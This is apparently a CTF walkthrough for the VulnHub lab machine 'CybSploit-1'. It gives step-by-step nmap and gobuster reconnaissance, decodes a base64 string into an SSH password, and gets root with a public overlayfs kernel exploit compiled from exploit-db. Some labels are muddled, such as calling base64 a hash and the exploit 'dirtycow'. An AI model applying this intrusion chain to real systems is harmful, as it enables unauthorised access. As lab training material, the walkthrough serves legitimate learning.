machine link : https://www.vulnhub.com/entry/cybersploit-1,506/
step1 : USE netdiscover or arp-scan -l ------ to get the ip of the machine from the network
step2 : USE nmap -T4 -sCV -p- 192.168.0.103 -vv -Pn ------ to get the open ports of the
machine
FINDING :
port 80 http is open
port 22 ssh is open
ssh version OpenSSH 5.9p1
step3 : open the ip in the browser ------the site will open
step4 : explore the site and view the sourse ------ at the bottom you will get the user name
itsskv
step5 : RUN gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirbuster/directory-list-
2.3- medium.txt ------ you will get a /robots file open it ------ http://192.168.0.103/robots -
----- you will get a hash
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
step6 : OPEN http://hashes.com or and https://www.base64decode.org/ ------ to crack the hash
------ you will get the result Flag1: cybersploit{youtube.com/c/cybersploit}
step7 : login with ------ ssh [email protected] -p 22 ------ with pwd :
cybersploit{youtube.com/c/cybersploit}
step8 : Inside ssh use whoami to find the user name ------ you will get ------ itsskv@cybersploit-
CTF:~$
step9 : Use command uname -r ------ to find the kernel version ------ you will get ------ 3.13.0-32-
generic
step10: Open new terminal and type ------ searchsploit 3.13.0 ------ to find the exploit name ------
you will get ------ Linux Kernel 3.13.0 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -
overlayfs Local Privilege | linux/local/37292.c ------ search it google
step11: In here https://www.exploit-db.com/exploits/37292
step12: In existing ssh cd /home/itsskv and vi exploit.c ------it will open text editor
step13: press i to enter and paste the exploit code , hit enter key and press esc key and press
:wq and hit enter and check with ls
step14: Now compile the exploit with gcc exploit.c -o dirtycow.c -pthread and after that chmod +x
dirtycow.c and then run the exploit with ./dirtycow.c
step15: Now write command whoami if all went good you will be root
|